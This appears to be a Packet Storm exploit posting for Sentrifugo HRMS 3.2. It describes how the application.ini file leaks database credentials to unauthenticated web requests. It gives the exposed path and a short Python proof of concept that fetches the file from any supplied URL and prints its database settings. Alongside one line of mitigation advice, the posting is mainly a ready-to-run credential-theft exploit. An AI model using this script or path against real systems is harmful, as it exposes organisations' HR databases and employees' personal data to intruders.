exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sentrifugo Human Resource Management System 3.2 File Disclosure

Sentrifugo Human Resource Management System 3.2 File Disclosure
Posted May 1, 2019
Authored by KingSkrupellos

Sentrifugo Human Resource Management System version 3.2 suffers from a database configuration file disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | a70ca60105b27e9f8ad4a49d9a01cf33c820b2ae7510f8751c0dcd035348c038

Sentrifugo Human Resource Management System 3.2 File Disclosure

Change Mirror Download
######################################################################

# Exploit Title : Sentrifugo Human Resource Management System 3.2
Database Configuration Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 02/05/2019
# Vendor Homepage : sentrifugo.com
# Software Download Link : sentrifugo.com/downloadzip/1556734875
github.com/sapplica/sentrifugo/archive/master.zip
# Software Affected Versions : 1.1.1 - 1.1.7 - 2.0.1 Beta - 2.1.1 -
3.1.1 and 3.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-16 [ Configuration ]
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

######################################################################

# Information about Software :
***************************
Sentrifugo is a FREE and powerful Human Resource Management System

(HRMS) that can be easily configured to meet your organizational needs.

#####################################################################

# Impact :
***********
Sentrifugo Human Resource Management System 3.2 configuration file may
potentially

disclose sensitive information to remote attackers.

The username and password of the database may be obtained trough the
"application.ini" file.

This is going to have an impact on confidentiality, integrity, and availability.

The configuration file unintentionally stored in
/application/configs/application.ini

HTTP requests consisting of a single character will cause the software
to disclose sensitive

configuration information, including the password/database to the
administrative web interface.

This file is installed, by default, with world readable and possibly
world writeable permissions enabled.

This may have some potentially serious consequences as the configuration file

also stores password information in plain text.

This issue occurs because access controls on configuration files are
not properly set.

An attacker can exploit this issue to retrieve potentially sensitive
information.

Attackers can access config file via URL request. This may aid in
further attacks.

The access to the /configs directory should be restricted with an adequate

countermeasure by the use of a .htaccess file.

* The product stores sensitive information in files or directories
that are accessible to actors

outside of the intended control sphere.

* An information exposure is the intentional or unintentional
disclosure of information to an actor

that is not explicitly authorized to have access to that information.

Installation Guide for Windows - Linux - MacOSX =>
sentrifugo.com/installation-guide

#####################################################################

# Database Configuration File Disclosure Exploit :
*******************************************
/application/configs/application.ini

Information :
*************
resources.db.adapter = PDO_MYSQL
resources.db.params.host = SENTRIFUGO_HOST
resources.db.params.username = SENTRIFUGO_USERNAME
resources.db.params.password = SENTRIFUGO_PASSWORD
resources.db.params.dbname = SENTRIFUGO_DBNAME
resources.db.isDefaultTableAdapter = true

Exploit - Proof of Concept :
**************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/application/configs/application.ini"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

#####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#####################################################################
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close